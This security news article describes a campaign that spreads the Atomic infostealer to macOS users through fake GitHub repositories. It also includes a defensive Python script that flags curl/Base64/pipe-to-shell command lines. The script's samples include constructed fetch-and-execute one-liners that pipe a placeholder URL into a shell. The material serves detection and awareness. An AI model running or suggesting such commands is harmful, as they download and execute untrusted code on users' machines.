A recent campaign targeting macOS users is exploiting public trust in well-known software brands by distributing malicious installers through fraudulent GitHub repositories. The attackers are delivering the “Atomic” infostealer malware, which is capable of harvesting sensitive user data.
This method involves impersonating reputable companies—including password managers, financial apps, and open-source tools—by creating GitHub pages that appear legitimate. Brands being spoofed include LastPass, 1Password, Thunderbird, Audacity, Robinhood, Shopify, and others.
To increase visibility, the attackers are employing search engine optimization (SEO) techniques to push their malicious links to the top of search results on platforms like Google and Bing. Users searching for software downloads that include terms like “GitHub” and “macOS” may be directed to one of these pages.
These GitHub repositories reuse familiar branding, logos, and language to appear authentic. Instead of offering a normal download, however, they instruct visitors to paste a command into the macOS Terminal, typically one built around curl. The command hides its real destination as a Base64-encoded URL; once decoded, that URL is used to download and run a shell script.
The shell script installs the Atomic infostealer. Once active, the malware can extract passwords, browser data, and other sensitive information stored on the user’s system.
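The fetch, decode, and execute chain described above is something a security team can look for in shell history, EDR process telemetry, or a ticketed "paste this command" report. The following Python script is an added example written for this article; it is not code from LastPass's TIME team or from the campaign itself. It scores a command line on the signals the article names (a curl or wget fetch, a `base64` decode step, a pipe or `sh -c` into a shell, and a Base64 token that decodes to a URL). The sample commands and the `example.invalid` domain are constructed for the demonstration and are not indicators from the real campaign.

```python
import base64
import re

# Signals that make up the chain the advisory describes: a network fetch,
# a Base64 decode step, and execution of the result by a shell.
FETCH_RE = re.compile(r"\b(curl|wget)\b")
B64_DECODE_RE = re.compile(
    r"\bbase64\s+(?:-[dD]|--decode)\b|\bopenssl\s+(?:base64|enc)\s+-d\b"
)
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b"      # ... | sh
    r"|\b(?:sh|bash|zsh)\s+-c\s"               # sh -c "..."
    r"|\b(?:sh|bash|zsh)\s+<\("                # bash <(...)
)
# A run of Base64 alphabet characters long enough to hide a URL.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_hidden_strings(command: str) -> list[str]:
    """Return printable text recovered from Base64-looking tokens in a command line."""
    found = []
    for token in B64_TOKEN_RE.findall(command):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="ignore")
        if text and text.isprintable():
            found.append(text)
    return found


def assess_command(command: str) -> dict:
    """Score one command line against the fetch / decode / execute pattern."""
    hidden_urls = [u for s in decode_hidden_strings(command) for u in URL_RE.findall(s)]
    signals = {
        "fetch": bool(FETCH_RE.search(command)),
        "base64_decode": bool(B64_DECODE_RE.search(command)),
        "pipe_to_shell": bool(PIPE_TO_SHELL_RE.search(command)),
        "hidden_url": bool(hidden_urls),
    }
    # Executing fetched or decoded content is the decisive signal; a URL that
    # had to be Base64-decoded to be seen is suspicious on its own.
    suspicious = (
        (signals["fetch"] and signals["pipe_to_shell"])
        or (signals["base64_decode"] and signals["pipe_to_shell"])
        or signals["hidden_url"]
    )
    return {
        "command": command,
        "signals": signals,
        "hidden_urls": hidden_urls,
        "verdict": "suspicious" if suspicious else "benign",
    }


def flag_suspicious(commands: list[str]) -> list[str]:
    """Return only the command lines that match the pattern."""
    return [c for c in commands if assess_command(c)["verdict"] == "suspicious"]


# Constructed sample command lines (not real IoCs). The first mimics the
# Terminal one-liner the article describes; the placeholder URL is encoded
# at runtime so the script stays self-contained.
HIDDEN = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE_COMMANDS = [
    f'sh -c "$(curl -fsSL $(echo {HIDDEN} | base64 -D))"',
    "curl -s https://example.invalid/setup.sh | bash",
    "curl -fsSL https://example.invalid/releases.json -o releases.json",
    "base64 -d photo.b64 > photo.png",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for result in map(assess_command, SAMPLE_COMMANDS):
        print(f"{result['verdict']:<10} {result['command']}")
        if result["hidden_urls"]:
            print(f"           decoded URL: {result['hidden_urls'][0]}")
```

Two of the five constructed lines are flagged: the Base64-wrapped curl one-liner (with its decoded URL surfaced for triage) and the plain `curl ... | bash`. The ordinary download, the local `base64 -d` of a file, and the directory listing stay benign, which is the point of requiring a fetch or decode step to be combined with shell execution rather than alerting on `curl` or `base64` alone.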
The campaign was flagged by LastPass’s Threat Intelligence, Mitigation, and Escalation (TIME) team, who released technical details and indicators of compromise (IoCs) to assist other security teams in identifying and mitigating the threat. The team also noted that takedown and disruption efforts are underway.
This attack highlights a growing trend of using developer-focused platforms like GitHub to distribute malware. It also underscores the importance of verifying software sources—especially when prompted to run terminal commands.
Security professionals are advised to monitor for unusual network activity, scrutinize installation sources, and educate end users on the risks of installing software from unofficial or unfamiliar repositories.